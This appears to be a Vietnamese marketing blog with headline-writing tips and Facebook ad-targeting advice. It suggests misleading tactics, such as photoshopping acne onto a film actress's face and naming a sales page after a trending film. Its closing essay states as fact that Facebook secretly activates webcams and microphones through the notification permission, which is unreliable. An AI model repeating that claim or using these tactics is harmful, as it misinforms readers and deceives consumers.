  Khi sử dụng những từ “này” và “vì sao” trong tiêu đề, bạn đang tạo ra những lời tuyên bố gây chú ý, khiến cho người đọc mong muốn đọc tiếp. Nếu bạn chỉ nói “Ván trượt tuyết của chúng tôi là hoàn hảo”, sẽ có rất ít người quan tâm. Nhưng khi bạn nói “Vì sao ván trượt tuyết này của chúng tôi được đánh giá là hoàn hảo?”, bạn đang khơi gợi sự tò mò – một trong những động lực mạnh mẽ nhất có thể thúc đẩy con người hành động.

  11. Xưng “tôi” trong tiêu đề

  Họ cười cợt khi tôi ngồi vào đàn piano – cho đến khi tôi bắt đầu chơi đàn

  Cuối cùng tôi đã khám phá ra bí kíp để viết hay

  Dù ở nơi đâu, mỗi khi tôi quệt mũi, tôi lại kiếm ra tiền

  Những tiêu đề xưng ngôi thứ nhất sẽ luôn phát huy tác dụng một khi khơi gợi được trí tò mò hoặc hứa hẹn một lợi ích đủ lớn cho người đọc. Chẳng hạn những ai muốn học chơi piano chắc chắn sẽ bị thu hút bởi tiêu đề trong ví dụ đầu tiên (nó là một trong những tiêu đề quảng cáo thành công nhất mọi thời đại). Việc dùng đại từ nhân xưng “bạn”, “của bạn” trong tiêu đề không phải lúc nào cũng hiệu quả vì chúng là dấu hiệu thường thấy của quảng cáo và người đọc sẽ phòng thủ ngay. Trong khi đó, bạn xưng “tôi”, thông điệp trong tiêu đề sẽ được truyền tải đến người đọc một cách tự nhiên và dễ chịu hơn. Chẳng hạn ví dụ này: “Tôi muốn giúp đỡ mọi người, và đó là lý do tôi mở hãng bảo hiểm của riêng mình!”

  12. Gọi tên sản phẩm trong tiêu đề

  Vitamin của Gymco đã giúp các vận động viên đạt thành tích siêu tốc như thế nào

  Thang gập Fiskin đã cứu mạng chồng tôi

  Thoughline đã giúp tôi khám phá bí kíp để viết hay

  “Làm thế nào để trị mụn cóc là một tiêu đề tốt”, nhưng “Làm thế nào mà Vitalism trị dứt mụn cóc” còn tốt hơn. Không phải độc giả nào cũng dừng lại để đọc bài viết của bạn, nên việc đưa tên thương hiệu vào tiêu đề giúp nó truyền tải thông tin được nhiều hơn. Nhưng đừng cố làm cho tên thương hiệu trở thành điểm nhấn chính của tiêu đề. Thay vào đó, hãy tập trung viết tiêu đề có nội dung thật hấp dẫn, sau đó hãy chèn tên công ty vào.

  13. Dùng từ “cần gấp”

  Cần gấp – Những ai đang bị căng thẳng thần kinh

  Cần gấp – Những anh chàng can trường

  Cần gấp – Những nhà quản lý đã sẵn sàng cho các khoản lợi nhuận bất ngờ

  “Cần gấp” là một từ gây tò mò hiệu quả. Hãy dùng nó để mở tiêu đề và người đọc sẽ không ngừng tìm hiểu vì sao bạn lại cần gấp những người căng thẳng (cho một buổi hội thảo về kỹ năng vượt qua nỗi sợ chẳng hạn), hoặc vì sao bạn lại cần gấp những nhà quản lý (để mời họ tham gia một chương trình học quản lý). Hãy nói chuyện trực tiếp với đối tượng độc giả bạn muốn.

  14. Sử dụng từ “đột phá” trong tiêu đề

  Đột phá trong hệ thống báo cháy

  Tiết lộ một công thức đột phá để điều trị rụng tóc

  Cần gấp – Những luật sư muốn thành công đột phá

  Từ “đột phá” gắn liền với tính chất nóng hổi, sốt dẻo. Nó có ý nghĩa rằng sản phẩm hoặc dịch vụ của bạn có thể đánh bại mọi đối thủ. Bạn có thể dùng từ ngữ khác có tác dụng tương tự như “kỷ lục”, “mang tính cách mạng”…

  15. Vận dụng chữ in hoa và chữ thường

  TIÊU ĐỀ TOÀN CHỮ IN HOA RẤT KHÓ ĐỌC

  Tiêu đề vừa chữ In hoa và chữ Thường dễ đọc hơn

  7 Tố chất khác biệt tạo nên Nhà lãnh đạo Xuất chúng

  Bạn hiểu ý tôi chứ?

  Nếu độc giả phải căng mắt lên để đọc tiêu đề của bạn, họ có thể mất tập trung và không thèm đọc nữa.

  16. Vận dụng tốt số lượng từ cho phép

  Nó thật tuyệt vời!

  Đã bao nhiêu lần bạn tự nói với chính mình, “Chưa tôi vẫn chưa được đọc nó; tôi đã muốn đọc nó từ rất lâu rồi!

  Còn ai khác muốn sở hữu một bộ bàn ghế nội thất thật đẳng cấp?

  Tieu đề có thể dài hoặc ngắn. Miễn là chúng thu hút được sự chú ý cả những đối tượng khách hàng bạn nhắm đến, khiến họ tò mò hoặc háo hức mua hàng, thì dài ngắn không thành vấn đề. Hiển nhiên, bạn không nên phí phạm câu chữ của mình. Nhưng bạn cũng không nên giới hạn chúng.

  17. Nêu bật ưu thế

  Áo sơ-mi giảm giá 50%

  Ưu đãi đặc biệt khi thay nhớt xe ở đây

  Đăng ký tham gia 6 tháng – Được miễn phí thêm 6 tháng

  Bạn cần nhấn mạnh những ưu điểm nổi bật của sản phẩm hoặc dịch vụ của mình. Bạn có những chế độ ưu đãi hay khuyến mãi gì trội hơn các đối thủ. Hãy tập trung vào những điểm đó.

  18. “Còn ai khác”

  Còn ai khác muốn trở thành tác giả viết sách?

  Còn ai khác đã từng luôn ca bài ca “Tôi không thể”?

  Còn ai khác muốn sở hữu hệ thống chống trộm hoàn hảo?

  “Còn ai khác” là một cụm từ thu hút hữu hiệu. Nó có ý nghĩa rằng đã có người được sở hữu hoặc trải nghiệm những sản phẩm hoặc dịch vụ tuyệt diệu của bạn và khẳng định rằng những độc giả cũng sẽ có cơ hội tương tự.

  Xem thêm: ActionCOACH giúp doanh nghiệp nhìn nhận marketing như khoản đầu tư

  19. Bảo hành, bảo đảm.

  Thảm chùi chân bảo đảm siêu sạch

  Bảo đảm trèo đèo lội suối suôn sẻ – Bằng không chúng tôi sẽ hoàn lại tiền cho bạn!

  Chúng ta đang sống trong một thời kỳ mà thật giả lẫn lộn. Lời chào hàng của bạn hãy đi kèm với một sự bảo đảm. Nếu bạn có thể khẳng định chế độ đảm bảo hoặc bảo hành ngay trong tiêu đề, nó sẽ thuyết phục độc giả tốt hơn và khiến họ quyết định đọc toàn bộ mẩu quảng cáo.

  20. Thừa nhận một khuyết điểm

  Chúng tôi chỉ là số hai. Nên chúng tôi không ngừng nỗ lực.

  Đầu bếp này nấu được mọi món ngon hảo hạng trừ Salad.

  Độc giả sẽ tin tưởng bạn hơn khi bạn thừa nhận rằng mình không hoàn hảo. Trên thực tế đã có quá nhiều những mẩu quảng cáo và thư chào hàng tự nhận mình có khả năng chữa bách bệnh cho mọi vấn đề của bạn. Điều đó chẳng đáng tin chút nào. Trong khi đó, nếu bạn khiêm tốn hơn một tí, người ta sẽ tin tưởng hơn những nội dung còn lại. Bạn chỉ có thể thu hút người khác khi họ đã thực sự tin tưởng bạn.

  21. Tập trung vào những kết quả tích cực

  Làm trắng răng trong 10 ngày!

  Giảm 7kg trong 30 ngày!

  Nếu bạn muốn bán được hàng, đừng vẽ nên một bức tranh tiêu cực cho độc giả. Con người ta chi tiền để mua hy vọng và những giấc mơ. Bạn không bán “thuốc tiêu mỡ thừa” mà đang bán “Một cơ thể khỏe mạnh hơn”. Đừng rao bán kem đánh răng bằng cách đe dọa người ta rằng “Răng vàng thật xấu” mà thay vào đó, hãy nói điều họ muốn: “Một hàm răng trắng xinh!” Khách hàng bỏ tiền để mua giải pháp chứ không phải nỗi đau. Những giải pháp của bạn cũng cần phải khả thi hoặc đáng tin. Nếu tiêu đề của bạn nói quá sự thật, người đọc sẽ không tin. “Giảm 7kg trong 30 ngày” là một hiệu quả có thể tin được. Nhưng “Giảm 7kg trong 1 đêm” thì đúng là chuyện không tưởng.

  22. Cảnh báo độc giả

  Lời cảnh báo dành cho các bác sĩ!

  Cánh báo: Lũ trẻ nhà bạn có hay táy máy chiếc loa này?

  Cảnh báo dành cho những người chủ doanh nghiệp nhỏ

  Bạn có thể gây chú ý cho mọi người bằng cách phát đi một thông điệp cảnh báo. Các cảnh báo luôn có tính chất hứa hẹn thông tin và khơi gợi trí tò mò.

  23. Cẩn thận với sự hài hước

  Không phải ai cũng thích những trò cười. Một truyện cười có thể vui nhộn với người này nhưng chưa chắc chọc cười được người kia. Và trên thực tế, không nhiều người mua hàng vì những chiêu trò chọc cười, như một câu khẩu hiệu kinh điển của quảng cáo “Không ai mua hàng từ những thằng hề”. Những phi vụ bán hàng bằng những chiêu trò gây cười thường thất bại là vì thế. Vì sao ư? Bạn đang bán hàng chứ không phải làm những trò hề. Bạn muốn người ta mua hàng hay chỉ cười rồi thôi? Nếu bạn vẫn muốn bài quảng cáo của mình trở nên hài hước, hãy cố gắng làm cho điểm nhấn gây cười trùng khớp với thông điệp quảng cáo của bạn.

  24. “Dễ như trở bàn tay”

  Hư ống nước? Chuyện nhỏ!

  Một mẹo cực đơn giản để chống dột mùa mưa

  Con người ai cũng muốn đạt được kết quả nhanh chóng mà lại dễ dàng. Nếu bạn hoặc sản phẩm của bạn có thể giúp cuộc sống khách hàng trở nên dễ dàng và thoải mái hơn, hãy nói thẳng điều đó.

  25. Cẩn thận với nền đen chữ trắng

  Bạn có thể dùng phong cách thiết kế âm bản (nền đen – chữ trắng) cho tiêu đề, nhưng đừng lạm dụng nó trên toàn bộ mẫu quảng cáo, trang web hoặc thư chào hàng của bạn. Hình thức trình bày kiểu âm bản có thẻ gây khó chịu cho người đọc. Tuy nhiên, nếu bạn chỉ dùng nó để làm nổi tiêu đề, nó có khả năng gây chú ý cho người đọc.

  26. Cường điệu những lợi ích

  Chấm dứt những tháng ngày ngủ như cá mòi! Hãy say giấc như một vị Vua!

  Dùng “Gối nhạc” để say giấc cùng Neil Diamond”!

  Con người ta luôn thích hành động. Họ khao khát được là một phần của những cuộc chơi. Hãy cho họ biết sản phẩm hoặc dịch vụ của bạn thú vị như thế nào bằng cách nêu bật và cường điệu những lợi ích chúng mang lại.

  27. Sử dụng những khuông mẫu công thức đã được kiểm chứng và thừa nhận

  HÀNG MỚI VỀ – Phương pháp thống kê mới!

  LỜI KHUYÊN dành cho những người là chủ gia đình!

  SỰ THẬT VỀ quy trình sửa giày

  David Ogilvy, trong cuốn sách “Lời tự thú của một Nhà quảng cáo” đã liệt kê những từ khóa luôn hiệu quả trong tiêu đề như sau:

  Miễn phí, Mới, Làm thế nào, Bất ngờ, Ngay bây giờ, Xin giới thiệu, Xin ra mắt, Ở ngay đây, Hàng mời về, Quan trọng, Cải tiến, Tuyệt vời, So sánh, Sốc/giật gân, Vượt trội, Cách mạng, Đáng kinh ngạc, Kỳ diệu, Phép màu, Khuyến mãi,Nhanh chóng, Dễ dàng, Cần gấp, Thử thách, Lời khuyên dành cho …, Sự thật về …, Giảm giá, Nhanh lên nào, Cơ hội cuối cùng, Hiện tượng, Hé lộ, Thành công, Độc đáo, Hấp dẫn, Bảo đảm, Độc nhất, Đầu tiên, Tình yêu, Quyền năng, Siêu đẳng, Cuối cùng, Tuyệt vời, Số lượng có hạn, Hiện tượng,Ra mắt, Làm thế nào

  28. Nêu những lý do

  3 lý do bạn nên viết sách

  5 lý do bạn nên gặp bác sĩ ngay hôm nay

  7 lý do bạn nên sử dụng dịch vụ giúp việc này

  Những lý do sẽ giúp độc giả gắn kết với bài viết của bạn. Nếu muốn hiểu thêm vì sao, họ buộc lòng phải đọc tiếp. Bí kíp để phương pháp này luôn phát huy tác dụng là nhằm thẳng vào đối tượng khách hàng bạn muốn. Nếu bạn đang quảng cáo cho dịch vụ kế toán, hãy cho khách hàng những lý do tại sao họ nên sử dụng dịch vụ kế toán của bạn. Nếu bạn đang quảng cáo cho một tiệm bánh, hãy nêu lên những lý do vì sao bánh của bạn ngon hơn những nơi khác.

  29. Thủ pháp trước – sau

  Những điều nên và không nên khi chọn mua ô tô đã qua sử dụng

  Đây là một thủ pháp quen thuộc để chứng minh sự khác biệt trong dịch vụ của bạn. Nếu bạn đang quảng cáo cho một dịch vụ làm vườn, bạn có thể sử dụng tiêu đề với ý nghĩa biến một khu rừng rậm lộn xộn thành một công viên cây xanh xinh đẹp. Điều bạn làm ở đây là so sánh giữa những gì khách hàng đang có (tức là những vấn đề của họ) với những gì bạn có thể làm cho họ (tức là những giải pháp của bạn).

  ( trong bài viết mình tham khảo thêm từ cuốn ” thôi miên bằng ngôn từ” các bạn có thể tìm đọc)

  Chúc các bạn giật title thành công và trở thành nữ hoàng giật title, ông hoàng tagline nhé ka ka ?

 • TARGET QUẢNG CÁO

 • Kỹ thuật 3 bước mix Target & Content quảng cáo Facebook

  Chào các bạn, từ trước đến nay khi các bạn đi học quảng cáo các thầy vẫn nói nhiều về target phải thế lọ thế chai, vẽ vời đủ các thứ hoặc viết nội dung thì phải xyz các kiểu… Chưởng môn cũng chẳng nói với các bạn là kiến thức các bạn học được là đúng hay sai, mà đa phần tôi thấy nó chỉ là bốc phét từ trí tưởng tượng các thầy ra thoai các bạn ạ =)))

  Mà cứ cho là đúng ở phần nào đấy, thì thực tế rất khác kiến thức các thầy đang dạy về target hay content (khi mà khách hàng đang thay đổi và tiến hóa hàng ngày ). Nó sẽ giống như kiểu các bạn được cho học ở trường quốc tế kiến thức cao siêu #_VKL_ nhưng không thầy nào dạy các bạn ứng dụng, tư duy bản chất, hay kết hợp sao cho uyển chuyển thì cũng chỉ kiến thức cũ ( quá nhiều người làm thế roài ) hoặc kiến thức chết ( bạn ko biết ứng dụng sao cho hiệu quả ).

  Xem thêm: Khóa học chạy quảng cáo Facebook tại Hà Nội

  Với kỹ thuật 3 bước mix Target & Content quảng cáo Facebook dưới đây, nếu các bạn chịu khó thực hành nhiều lần, nó sẽ giúp các bạn có 1 kết quả quảng cáo vượt ngoài mong đợi. Ok let’s go

  Bước 1: Tạo chân dung khách hàng từ target

  3 điểm quan trọng các bạn bắt buộc phải gạch đầu dòng được trong bước này

  Độ tuổi, giới tính, 2-3 sở thích chính

  Các vấn đề chính mà các độ tuổi thường quan tâm:

  Độ tuổi từ 18 đến 24: Thế giới giải trí, sock, tình yêu, tình dục, phim ảnh, âm nhạc, idol

  Độ tuổi từ 24 đến 34: phim ảnh, gia đình, thể thao, idol, khởi nghiệp, làm giàu, cơ hội, cảnh báo

  Độ tuổi từ 34 đến 45: Phim ảnh, Kinh tế, tập đoàn, thời sự, chính trị, các thú chơi

  Độ tuổi 45 đến hết: Các thú chơi, chính trị

  Bước 2: Nghiên cứu trend, chọn nội dung viral

  Để nhận biết 1 trend đang hot trên Social, chúng ta có thể dùng các tool sau đây

  https://www.socialbakers.com/statistics/facebook/

  https://www.youtube.com/feed/trending

  https://trends.google.com.vn/trends/?geo=VN

  https://trends.google.com.vn/trends/trendingsearches/daily?geo=VN

  Bạn hãy chọn ít nhất 2 trend phù hợp với độ tuổi của tập khách hàng của bạn, nhớ rằng phải chọn chính xác được trend mà ĐỘ TUỔI khách hàng đang quan tâm. Điều này quyết định rất nhiều về content của các bạn sẽ thiên biến vạn hóa như thế nào cho phù hợp với trend. Nếu còn lấn cấn, hãy thử hỏi 1 vài người bạn mà bạn biết về Trend bạn định khai thác ví dụ: Tại sao họ thấy hay ? Ấn tượng nhất với nhân vật nào ?

  Bước 3: Đưa nội dung trend vào bán hàng

  Đưa một nội dung bắt trend vào bán hàng sao cho khách hàng đọc cảm thấy thú vị và dừng lại ở mẫu quảng cáo của bạn là một kỹ thuật đòi hỏi bạn cần tư duy rất nhiều. Thường thì phải làm nhiều lần mới nhuần nhuyễn, vì vậy để bắt đầu tốt nhất bạn nên là thử 3 4 mẫu quảng cáo để test ngân sách nhỏ, cái nào có bid thầu rẻ nhất thì đem ra vit camp x10 x20 ngân sách

  Ở đây, tôi sẽ ví dụ cho các bạn 1 trường hợp để các bạn dễ hình dung. Ví dụ tôi có 1 sản phẩm trị mụn bán cho nữ tuổi từ 24 đến 34. Sau khi nghiên cứu trend tôi thấy phim GẠO NẾP GẠO TẺ đang là hot trend với chị em, và tôi sẽ làm nội dung mix với trend này.

  Nhớ Photoshop cho Minh có mấy cái mụn ở mặt nhé, lấy ảnh này làm ảnh chính của mẫu QC, các ảnh sản phẩm để ở phía sau =))

  Các title cho bài viết quảng cáo tôi có 1 số gợi ý:

  • Gạo Nếp Gạo Tẻ – Lý do Minh bị ba của Nhân đuổi ra khỏi nhà
  • Bật mí: Minh bị ba của Nhân đuổi thẳng cổ ra khỏi nhà trong Gạo Nếp Gạo Tẻ vì …
  • Tại sao Minh đau khổ ra khỏi nhà Nhân vì bị đuổi ?
  • Hé lộ: Gạo Nếp Gạo Tẻ, Minh xinh đẹp thôi vẫn chưa đủ vẫn bị đuổi ra khỏi nhà…

  Phần nội dung thì chắc các bạn biết phải viết gì rồi chứ =)) tự diễn giải nốt nhé Còn nếu các bạn thầy khó quá, kiểu ép học sinh giỏi toán làm văn thì tốt nhất các bạn gạch đầu dòng rồi đi thuê người khác viết. Have fun

  NOTE: Với những bạn chỉ tập trung bán hàng, không quan tâm đến vấn đề brand ( thương hiệu). Các bạn có thể tạo page tên viral theo trend luôn để tận dụng kết hợp bán hàng. Ví dụ như với trường hợp ở trên tôi có thể tạo luôn 1 page tên: GẠO NẾP GẠO TẺ để vừa đăng nội dung bán hàng vừa đăng các video viral đã chỉnh sửa kết hợp bán hàng cực mạnh.

 • Tư duy TARGET chuẩn để ĐỔI XE MUA NHÀ

  Chào các bạn, hôm nay chưởng môn viết post này để tập trung khai thác 1 chủ đề thôi: TARGET

  Có một điều rất hài hước, khi mình lắng nghe các học viên của mình nói về cách họ được các thầy dạy dỗ về target, thì gần như 100% được dạy phải… tưởng tượng ra được khách hàng.

  Phân tích nhân khẩu học các kiểu: Độ tuổi, giới tính, tình trạng hôn nhân, thời gian nào hay ra quyết định mua hàng, ai là người ra quyết định, ra quyết định ở đâu …ối giời ơi vân vân và mây mây… ( Ngồi phân tích xong thì đối thủ nó bán cụ hết hàng rồi còn đâu khách mà bán =)) xàm lông )

  TOÀN THẦY LÝ THUYẾT

  Lý giải cho điều này thì chỉ có các thầy đọc sách marketing offline rùi đi dạy lại, hoặc google rùi học mót mỗi chỗ 1 tý để dạy học viên =)))

  Trong bài viết này chưởng môn sẽ hướng dẫn cụ thể các bạn cách #TƯ_DUY_TARGET TẤT CẢ CÁC NGÀNH HÀNG KHÔNG BAO GIỜ SAI

  VD: Bán hàng thời trang mà TARGET chẳng có chữ thời trang hay quần áo nào cả, các bạn có thể bán giày nam chẳng cần target giày, vớ, phụ kiện gì sất mà chỉ số CR ( chuyển đổi đơn hàng ) thì cam đoan lúc nào cũng x2 x3, so với mấy kiểu target nông dân học mà các bạn học được từ các thầy ka ka

  Thậm chí đi từ ngân sách nhỏ đến ngân sách to 10 triệu 1 ngày lun ??‍? trip to the moon luôn ?

  TƯ DUY TARGET NHƯ THẾ NÀO ?

  Tại sao riêng với TARGET chưởng môn lại hay dùng từ TƯ DUY mà không dùng kỹ thuật, hay tut trick… bla bla hoặc đặt mấy cái tên kiểu super target cho nó mĩ miều. Việc này thì phải quay về năm 2007 – 2009, khi nhắc đến quảng cáo online chúng ta chỉ có 2 sự lựa chọn: CPM network hoặc google adwords. Trong thời gian này mình đã có cơ hội tiêu rất nhiều tiền quảng cáo trên các network Việt Nam và thế giới, và mình nhận ra một việc: KEYWORDS chính là việc cần phải tập trung, và hành vi của người dùng tạo ra các keywords mà chúng ta nhắm đến để mua quảng cáo. Mà các bạn đều biết, hành vi người dùng online vốn dĩ là không thể phân tích ( họ nay thế này mai thế khác và ko bao giờ trung thành ) lại càng đéo bao giờ tưởng tượng ra nổi, bởi vì họ như đàn cừu ấy. Vốn dĩ các thông tin bây giờ là do TRENDs điều hướng, trends được cấu thành từ các NEWS (kênh báo chí ) + KOL ( những người nổi tiếng )…

  Điểm qua lại như vậy để thấy rằng TƯ DUY về target dù ở bất kỳ Ads Network nào, thời nào đi nữa. Thì lựa chọn Target theo nhân khẩu học là lựa chọn có SỨC CẠNH TRANH CAO NHẤT và cũng là sau cùng. Thay vào đó chưởng môn thường TARGET khách hàng thông qua các từ khóa mà họ ” THƯỜNG XUYÊN NHẮC ĐẾN ” – NHANH – CỰC MẠNH – CHÍNH XÁC

  Trong bài viết này, mình gạt yếu tố content sang một bên. Mặc nhiên mình có 1 mẫu quảng cáo có điểm phù hợp 10, vậy target như thế nào để mình GIẢM SỨC CẠNH TRANH BÁN HÀNG đồng thời đẩy chỉ số CR ( chuyển đổi đơn hàng ) lên mức cao nhất thông qua một target chuẩn.

  BÂY GIỜ ĐI VÀO THỰC HÀNH TARGET NHÉ

  Giả thiết SỐ 1 ( NGÂN SÁCH NHỎ ) 

  mình có 1 sản phẩm về thời cao cấp cho nữ tuổi từ 24 đến 38, dự kiến ngân sách của mình chỉ có 1 triệu / 1 ngày. Với ngân sách này thì 1 ngày mình chỉ phủ được đâu đó khoảng 150 – 200k đối tượng dự kiện. Vậy nên mình sẽ khống chế tệp target trong khoảng 1,2 – 1,5 triệu người ok. Thay vì target vào các từ khóa: thời trang cao cấp, thời trang ..v…v… mình sẽ thử target vào các NHÃN HIỆU mà các khách hàng thường nhắc đến để giảm SỨC CẠNH TRANH BÁN HÀNG nhé: 

  GIẢ THIẾT SỐ 2 ( NGÂN SÁCH > 10 triệu 1 ngày)

  vẫn là sản phẩm trên, tuy nhiên với ngân sách lớn thì mình không thể tư duy target theo mỗi nhãn hiệu đc nữa. Nó quá bé để VIT ngân sách, vậy nên lúc này mình cần mở rộng các keywords hay nói cách khác là mở rộng thú chơi ( niềm đam mê ) của khách hàng: ví dụ các nhãn hiệu xe BMW, MERC, thể thao golf, đầu tư bđs, kim cương .v…v… hòng mở rộng tệp target > 2tr để chịu được ngân sách quảng cáo.

  CHỐT LẠI, các bạn thấy đấy chưởng môn vừa target sản phẩm thời trang mà chẳng có chữ THỜI TRANG NÀO CẢ =)) ka ka, chúc các bạn tăng được tỷ lệ chốt đơn thành công nhé.

 • Thời của Micro target và Nano target đã chấm hết hay chỉ mới bắt đầu?

  Vô tình phát hiện ra ” hoá ra ông lớn cũng chơi bẩn “

  Tôi vẫn nhớ như in vào một buổi đêm hè giữa năm 2017 khi tôi đang lên camp cho khách hàng của mình thì đột nhiên chiếc laptop XPS của tôi sáng đèn xanh ( đèn chỉ auto bật khi camera khởi động và vào buổi tối ). Tôi có thói quen làm việc trong bóng đêm để giữ sự tập trung.

  Trong đầu tôi loé lên việc một phần mềm nào đó trong máy của mình đang thu thập dữ liệu người dùng, hay rồi đây. Và tôi giữ nguyên các task đồng thời install Http Analyzer để coi các dữ liệu của máy tôi đc thu thập sẽ gửi về đâu, IP nào. Trong lúc cài đặt tôi nghi cho đủ thứ, tôi nghi luôn cho cả mấy tab mình đang truy cập gồm: vietnamnet + 24h + một số thanh niên làm blog ở việt nam.

  Vì tôi nghĩ chỉ có mấy thanh niên việt nam mới nghịch ngợm mấy trò này. Kết quả thật bất ngờ, kết quả cho thấy dữ liệu đang được gửi với các gói lớn về một loạt các địa chỉ có dạng sub xxx.fb.xx… hiển nhiên đây là những server của website tôi không ngờ đến nhất FB.

  Và hiển nhiên, với linh cảm của một người làm về tài khoản chuyên sâu. Tôi nghĩ rằng FB đang theo dõi, thu thập dữ liệu người dùng ở mức không ai ngờ tới. Tuy nhiên lúc đó vì nó chưa sinh ra tệp sở thích bổ xung, và quảng cáo FB cũng còn khá sơ khai với 3 nguồn cấp. Thậm chí lúc đó cũng mới có mục tiêu messenger.

  Nên tôi chỉ nghĩ hệ thống đang muốn deep tracking hòng loại bỏ các người dùng ảo hoặc các hệ thống làm clone hàng loạt. Giúp social của họ trở nên trong sạch hơn ( ngây thơ vãi )

  Ngay hôm sau tôi có post một bài lên group cộng đồng nói rằng FB ĐANG THEO DÕI NGƯỜI DÙNG QUY MÔ LỚN. Tôi nhận lại một đống gạch, rất nhiều người nói tôi ảo tưởng rồi FB nó có rảnh đéo đâu mà đi theo dõi bạn. Bạn là ai??? Bla bla…

  Thực ra vấn đề theo dõi người dùng cookie đối với các website lớn thông qua các công nghệ web tracking hay user tracking, pixel tracking cũng không phải gì mới mẻ. Vậy nhưng tự động bật webcam hay microphone lại là một sự xâm phạm riêng tư nghiêm trọng. Tôi đã ngây thơ nghĩ rằng US HỌ TÔN TRỌNG SỰ TỰ DO RIÊNG TƯ như thế thì bố bảo anh Mark cũng méo dám làm quá. Bật mode quét tài khoản giả mạo hay các farm nuôi trồng ở quy mô nông thôn là cùng. Nhưng sau này khi đầy đủ dữ kiện hơn, tôi nghĩ rằng buổi đêm hôm đó là giai đoạn Facebook bắt đầu đưa AI vào quản lý và theo dõi, gắn tag cho người dùng trên toàn thế giới. Còn tôi là kẻ vô tình rơi vào nhóm người beta cũng nên.

  Micro và Nano target là gì?

  Cuối năm 2017, hàng loạt các tệp được gọi là ” Sở thích bổ xung ” xuất hiện trong target Facebook Ads bên cạnh các interest trước đó mà các bạn khai báo khi lập profile.

  Đến tháng 2 / 2018 thì bắt đầu có các phương tiện truyền thông đưa tin đánh tiếng về việc Facebook và google đang theo dõi người dùng và họ có trao đổi dữ liệu để khai thác quảng cáo.

  Tháng 4 / 2018 Mark Xoăn trắng trợn tuyên bố Facebook theo dõi người dùng ngay cả khi bạn đéo đăng nhập, xong bị gọi lên điều trần rồi phạt lấy lệ. Bố tiên sư Us freedom =))

  Họ đã làm việc đó như thế nào? Dễ ẹc, ở phone thì khỏi bàn vì bạn install app đương nhiên cấp full quyền. Còn trên website thì sao? Họ đã làm thế nào để tự động bật microphone cùng webcam để theo dõi người dùng? Bí mật ở cái notify khi các bạn lần đầu tiên đăng nhập profile, mỗi khi các bạn ấn vào nút đồng ý cho phép FB hiển thị notify mới thì… bạn đã cấp quyền cho FB thông qua trình điều khiển webrtc trên trình duyệt, để điều khiển mic hay camera máy của các bạn. Việc này kết hợp với cookie sẽ dẫn đến việc chỉ cần bạn truy cập Facebook và kể cả đã log out ra ngoài. Hệ thống vẫn tracking môi trường liên tục và filter các keywords nó ghi nhận được để trả về datacenter, từ đó hệ thống liên tục gắn bạn vào các tag gọi là sở thích bổ xung. Vì vậy cũng đừng ngạc nhiên khi đang ngồi cạnh laptop tán phét với thằng bạn về mấy “đôi giày” 20p sau vào Facebook thì cả hai thằng ăn combo quảng cáo giày liên tọi.

  Có thể nói đây thực sự là một cuộc cách mạng, với công nghệ pixel tracking vào năm 2014 tôi đã thấy vi diệu cãi đái rồi. Thế mà giờ họ vận hành một hệ thống theo dõi hàng tỷ người, nghe lén hàng tỷ người… siêu việt cỡ nào??? Có thể nói 2018 – 2020 là giai đoạn hoàng kim của Nano target. Khi mà user mới chỉ nói ra vui miệng vài keywords nào đó thì thế giới social ads của họ sẽ xoay quanh nó ngay tắp tự.

  Tháng 4 năm 2021, Apple đã khởi động một phong trào điên rồ: Chặn hết, phải xin phép người dùng. Và tất nhiên động thái này làm Facebook vẫn đang tiếp tục sml, dân làm quảng cáo thì đua nhau từ bỏ sân chơi.

  Sau Nano target sẽ là gì?

  Nhưng Mark xoăn vốn là kẻ gan lỳ và nhiều tiên, ngay sau động thái của Apple. Lập tức Facebook thúc đẩy tập trung các phát triển cho việc ứng dụng VR ( tương tác thực tế ảo ) vào social của họ. Tất nhiên, nếu chỉ dừng ở việc tương tác đơn giản giống mấy cái game VR hành động nhanh nhàm chán thì sẽ không thể coi là một thế giới.

  Một thế giới có đầy đủ yếu tố để thúc đẩy phát triển phải tạo ra giá trị nào đó cho mỗi người chơi. Cách nhanh nhất là có giao thương, muốn có giao thương phải có đồng tiền cùng các pháp chế quản lý, giám sát. Điều này làm Mark đang điên cuồng tìm cách khởi động lại các chương trình ví + tiền số dạng stablecoin. Trong đó có việc kết hợp với Coinbase làm ví Novi và có lẽ còn nhiều vụ đi đêm khác mà chúng ta méo biết.

  Nếu tham vọng điên rồ của Mark xoăn thành công, và Horizon với công nghệ VR cùng 1 stablecoin ra đời. Thế giới sẽ thay đổi toàn diện nói chung và hành vi mua hàng nói riêng. Horizon sẽ trở thành một ngân hàng lớn nhất trái đất nắm giữ 1/5, thậm chí hơn nữa tiền mặt của thương mại bán lẻ thế giới.

  Ngoài ra nó sẽ là một cái market khổng lồ, có thể tưởng tượng nó giống Avarta phiên bản trái đất 2. Lúc này điều gì sẽ xảy ra với Horizon Ads ? Oh nó sẽ gần như KHÔNG CÒN GIỚI HẠN NGUỒN PHÂN PHỐI QUẢNG CÁO, không còn giới hạn về inventory hiển thị quảng cáo nữa vì Horizon có thể can thiệp vào mọi nơi trong cuộc sống của bạn để hiển thị quảng cáo. Và tất nhiên cuộc sống Horizon sẽ là cuộc sống của ĐỀ XUẤT NHANH MẠNH HƠN NỮA, không cần bạn nói ra AI có thể căn cứ hành vi tương tác mỗi ngày của bạn mà đề xuất quảng cáo sao cho phù hợp. Có lẽ gọi là electron hay proton target ? =))

  Điều gì chờ đợi những người làm quảng cáo trong tương lai?

  Chưởng môn nghĩ rằng bất kỳ một giai đoạn chuyển tiếp đều tạo ra những thứ mới mẻ và cơ hội quý giá nào đó. Cuộc chơi sẽ chỉ dành cho những người có chuẩn bị sẵn sàng, những người hiểu rõ luật chơi và biết thuận theo nó. Cùng chờ đợi và tích luỹ để trở thành những người tiên phong các bạn nhé.

  Trong lúc chờ đợi thì học khoá học quảng cáo Facebook đẳng cấp nhất Việt Nam nè

 • Được tài trợ bởi

  7Relax.com – TODAY, RANDOM SOUNDS MAX RELAX FOR #High #Sleep #Learn #Work #Reading #Yoga #Meditation …